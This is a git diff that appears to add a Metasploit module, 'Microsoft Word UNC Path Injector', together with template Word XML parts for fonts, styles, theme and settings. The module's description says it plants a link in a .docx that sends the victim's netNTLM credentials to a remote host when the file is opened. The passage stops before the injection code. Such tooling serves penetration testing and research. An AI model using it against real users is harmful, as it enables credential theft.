b/modules/auxiliary/docx/sourcedoc/word/fontTable.xml 
@@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<w:fonts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="20002A87" w:usb1="80000000" w:usb2="00000008" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Cambria"><w:panose1 w:val="02040503050406030204"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000004B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font></w:fonts> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/settings.xml b/modules/auxiliary/docx/sourcedoc/word/settings.xml new file mode 100644 index 000000000000..4692c237a851 --- /dev/null +++ b/modules/auxiliary/docx/sourcedoc/word/settings.xml 
@@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<w:settings xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main"><w:zoom w:percent="100"/><w:embedSystemFonts/><w:attachedTemplate r:id="rId1"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:doNotValidateAgainstSchema/><w:doNotDemarcateInvalidXml/><w:compat><w:useNormalStyleForList/><w:doNotUseIndentAsNumberingTabStop/><w:useAltKinsokuLineBreakRules/><w:allowSpaceOfSameStyleInTable/><w:doNotSuppressIndentation/><w:doNotAutofitConstrainedTables/><w:autofitToFirstFixedWidthCell/><w:underlineTabInNumList/><w:displayHangulFixedWidth/><w:splitPgBreakAndParaMark/><w:doNotVertAlignCellWithSp/><w:doNotBreakConstrainedForcedTable/><w:doNotVertAlignInTxbx/><w:useAnsiKerningPairs/><w:cachedColBalance/></w:compat><w:rsids><w:rsidRoot w:val="00B25E88"/><w:rsid w:val="00890656"/><w:rsid w:val="00B25E88"/><w:rsid w:val="00E97639"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="off"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:uiCompat97To2003/><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" 
w:followedHyperlink="followedHyperlink"/><w:doNotIncludeSubdocsInStats/><w:doNotAutoCompressPictures/><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/></w:settings> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/styles.xml b/modules/auxiliary/docx/sourcedoc/word/styles.xml new file mode 100644 index 000000000000..4a084626fc28 --- /dev/null +++ b/modules/auxiliary/docx/sourcedoc/word/styles.xml 
@@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<w:styles xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:docDefaults><w:rPrDefault><w:rPr><w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/><w:sz w:val="22"/><w:szCs w:val="22"/><w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/></w:rPr></w:rPrDefault><w:pPrDefault/></w:docDefaults><w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267"><w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="toc 1" w:uiPriority="39"/><w:lsdException w:name="toc 2" w:uiPriority="39"/><w:lsdException w:name="toc 3" w:uiPriority="39"/><w:lsdException w:name="toc 4" w:uiPriority="39"/><w:lsdException w:name="toc 5" w:uiPriority="39"/><w:lsdException w:name="toc 6" w:uiPriority="39"/><w:lsdException w:name="toc 7" w:uiPriority="39"/><w:lsdException w:name="toc 8" w:uiPriority="39"/><w:lsdException w:name="toc 9" w:uiPriority="39"/><w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/><w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" 
w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/><w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/><w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/><w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" 
w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Revision" w:unhideWhenUsed="0"/><w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException 
w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException 
w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException 
w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException 
w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Bibliography" w:uiPriority="37"/><w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/></w:latentStyles><w:style w:type="paragraph" w:default="1" 
w:styleId="Normal"><w:name w:val="Normal"/><w:qFormat/><w:rsid w:val="00B25E88"/><w:rPr><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr></w:style><w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont"><w:name w:val="Default Paragraph Font"/><w:uiPriority w:val="99"/><w:semiHidden/></w:style><w:style w:type="table" w:default="1" w:styleId="TableNormal"><w:name w:val="Normal Table"/><w:uiPriority w:val="99"/><w:semiHidden/><w:unhideWhenUsed/><w:qFormat/><w:tblPr><w:tblInd w:w="0" w:type="dxa"/><w:tblCellMar><w:top w:w="0" w:type="dxa"/><w:left w:w="108" w:type="dxa"/><w:bottom w:w="0" w:type="dxa"/><w:right w:w="108" w:type="dxa"/></w:tblCellMar></w:tblPr></w:style><w:style w:type="numbering" w:default="1" w:styleId="NoList"><w:name w:val="No List"/><w:uiPriority w:val="99"/><w:semiHidden/><w:unhideWhenUsed/></w:style></w:styles> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/theme/theme1.xml b/modules/auxiliary/docx/sourcedoc/word/theme/theme1.xml new file mode 100644 index 000000000000..a06c80529b6c --- /dev/null +++ b/modules/auxiliary/docx/sourcedoc/word/theme/theme1.xml 
@@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme"><a:themeElements><a:clrScheme name="Office"><a:dk1><a:sysClr val="windowText" lastClr="000000"/></a:dk1><a:lt1><a:sysClr val="window" lastClr="FFFFFF"/></a:lt1><a:dk2><a:srgbClr val="1F497D"/></a:dk2><a:lt2><a:srgbClr val="EEECE1"/></a:lt2><a:accent1><a:srgbClr val="4F81BD"/></a:accent1><a:accent2><a:srgbClr val="C0504D"/></a:accent2><a:accent3><a:srgbClr val="9BBB59"/></a:accent3><a:accent4><a:srgbClr val="8064A2"/></a:accent4><a:accent5><a:srgbClr val="4BACC6"/></a:accent5><a:accent6><a:srgbClr val="F79646"/></a:accent6><a:hlink><a:srgbClr val="0000FF"/></a:hlink><a:folHlink><a:srgbClr val="800080"/></a:folHlink></a:clrScheme><a:fontScheme name="Office"><a:majorFont><a:latin typeface="Cambria"/><a:ea typeface=""/><a:cs typeface=""/><a:font script="Jpan" typeface="MS ゴシック"/><a:font script="Hang" typeface="맑은 고딕"/><a:font script="Hans" typeface="宋体"/><a:font script="Hant" typeface="新細明體"/><a:font script="Arab" typeface="Times New Roman"/><a:font script="Hebr" typeface="Times New Roman"/><a:font script="Thai" typeface="Angsana New"/><a:font script="Ethi" typeface="Nyala"/><a:font script="Beng" typeface="Vrinda"/><a:font script="Gujr" typeface="Shruti"/><a:font script="Khmr" typeface="MoolBoran"/><a:font script="Knda" typeface="Tunga"/><a:font script="Guru" typeface="Raavi"/><a:font script="Cans" typeface="Euphemia"/><a:font script="Cher" typeface="Plantagenet Cherokee"/><a:font script="Yiii" typeface="Microsoft Yi Baiti"/><a:font script="Tibt" typeface="Microsoft Himalaya"/><a:font script="Thaa" typeface="MV Boli"/><a:font script="Deva" typeface="Mangal"/><a:font script="Telu" typeface="Gautami"/><a:font script="Taml" typeface="Latha"/><a:font script="Syrc" typeface="Estrangelo Edessa"/><a:font script="Orya" typeface="Kalinga"/><a:font script="Mlym" typeface="Kartika"/><a:font script="Laoo" 
typeface="DokChampa"/><a:font script="Sinh" typeface="Iskoola Pota"/><a:font script="Mong" typeface="Mongolian Baiti"/><a:font script="Viet" typeface="Times New Roman"/><a:font script="Uigh" typeface="Microsoft Uighur"/></a:majorFont><a:minorFont><a:latin typeface="Calibri"/><a:ea typeface=""/><a:cs typeface=""/><a:font script="Jpan" typeface="MS 明朝"/><a:font script="Hang" typeface="맑은 고딕"/><a:font script="Hans" typeface="宋体"/><a:font script="Hant" typeface="新細明體"/><a:font script="Arab" typeface="Arial"/><a:font script="Hebr" typeface="Arial"/><a:font script="Thai" typeface="Cordia New"/><a:font script="Ethi" typeface="Nyala"/><a:font script="Beng" typeface="Vrinda"/><a:font script="Gujr" typeface="Shruti"/><a:font script="Khmr" typeface="DaunPenh"/><a:font script="Knda" typeface="Tunga"/><a:font script="Guru" typeface="Raavi"/><a:font script="Cans" typeface="Euphemia"/><a:font script="Cher" typeface="Plantagenet Cherokee"/><a:font script="Yiii" typeface="Microsoft Yi Baiti"/><a:font script="Tibt" typeface="Microsoft Himalaya"/><a:font script="Thaa" typeface="MV Boli"/><a:font script="Deva" typeface="Mangal"/><a:font script="Telu" typeface="Gautami"/><a:font script="Taml" typeface="Latha"/><a:font script="Syrc" typeface="Estrangelo Edessa"/><a:font script="Orya" typeface="Kalinga"/><a:font script="Mlym" typeface="Kartika"/><a:font script="Laoo" typeface="DokChampa"/><a:font script="Sinh" typeface="Iskoola Pota"/><a:font script="Mong" typeface="Mongolian Baiti"/><a:font script="Viet" typeface="Arial"/><a:font script="Uigh" typeface="Microsoft Uighur"/></a:minorFont></a:fontScheme><a:fmtScheme name="Office"><a:fillStyleLst><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="50000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="35000"><a:schemeClr val="phClr"><a:tint val="37000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr 
val="phClr"><a:tint val="15000"/><a:satMod val="350000"/></a:schemeClr></a:gs></a:gsLst><a:lin ang="16200000" scaled="1"/></a:gradFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:shade val="51000"/><a:satMod val="130000"/></a:schemeClr></a:gs><a:gs pos="80000"><a:schemeClr val="phClr"><a:shade val="93000"/><a:satMod val="130000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="94000"/><a:satMod val="135000"/></a:schemeClr></a:gs></a:gsLst><a:lin ang="16200000" scaled="0"/></a:gradFill></a:fillStyleLst><a:lnStyleLst><a:ln w="9525" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"><a:shade val="95000"/><a:satMod val="105000"/></a:schemeClr></a:solidFill><a:prstDash val="solid"/></a:ln><a:ln w="25400" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:prstDash val="solid"/></a:ln><a:ln w="38100" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:prstDash val="solid"/></a:ln></a:lnStyleLst><a:effectStyleLst><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="38000"/></a:srgbClr></a:outerShdw></a:effectLst></a:effectStyle><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="35000"/></a:srgbClr></a:outerShdw></a:effectLst></a:effectStyle><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="35000"/></a:srgbClr></a:outerShdw></a:effectLst><a:scene3d><a:camera prst="orthographicFront"><a:rot lat="0" lon="0" rev="0"/></a:camera><a:lightRig rig="threePt" dir="t"><a:rot lat="0" lon="0" rev="1200000"/></a:lightRig></a:scene3d><a:sp3d><a:bevelT w="63500" h="25400"/></a:sp3d></a:effectStyle></a:effectStyleLst><a:bgFillStyleLst><a:solidFill><a:schemeClr 
val="phClr"/></a:solidFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="40000"/><a:satMod val="350000"/></a:schemeClr></a:gs><a:gs pos="40000"><a:schemeClr val="phClr"><a:tint val="45000"/><a:shade val="99000"/><a:satMod val="350000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="20000"/><a:satMod val="255000"/></a:schemeClr></a:gs></a:gsLst><a:path path="circle"><a:fillToRect l="50000" t="-80000" r="50000" b="180000"/></a:path></a:gradFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="80000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="30000"/><a:satMod val="200000"/></a:schemeClr></a:gs></a:gsLst><a:path path="circle"><a:fillToRect l="50000" t="50000" r="50000" b="50000"/></a:path></a:gradFill></a:bgFillStyleLst></a:fmtScheme></a:themeElements><a:objectDefaults/><a:extraClrSchemeLst/></a:theme> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/webSettings.xml b/modules/auxiliary/docx/sourcedoc/word/webSettings.xml new file mode 100644 index 000000000000..b4a16977f713 --- /dev/null +++ b/modules/auxiliary/docx/sourcedoc/word/webSettings.xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:optimizeForBrowser/></w:webSettings> \ No newline at end of file diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb new file mode 100644 index 000000000000..95410ef7cf4d --- /dev/null +++ b/modules/auxiliary/docx/word_unc_injector.rb 
@@ -0,0 +1,320 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://Metasploit.com/projects/Framework/ +## + +require 'msf/core' +require 'zip/zip' + +class Metasploit3 < Msf::Auxiliary + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Word UNC Path Injector', + 'Description' => %q{ + This module modifies a .docx file that will, upon opening, submit all + stored netNTLM credentials to a remote host. It can also create an empty docx file. + If emailed the receiver needs to put the document in editing mode + before the remote server will be contacted. Preview and read-only + mode do not work. Verified to work with Microsoft Word 2003, + 2007 and 2010 as of Januari 2013 date by using auxiliary/server/capture/smb + }, + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 1 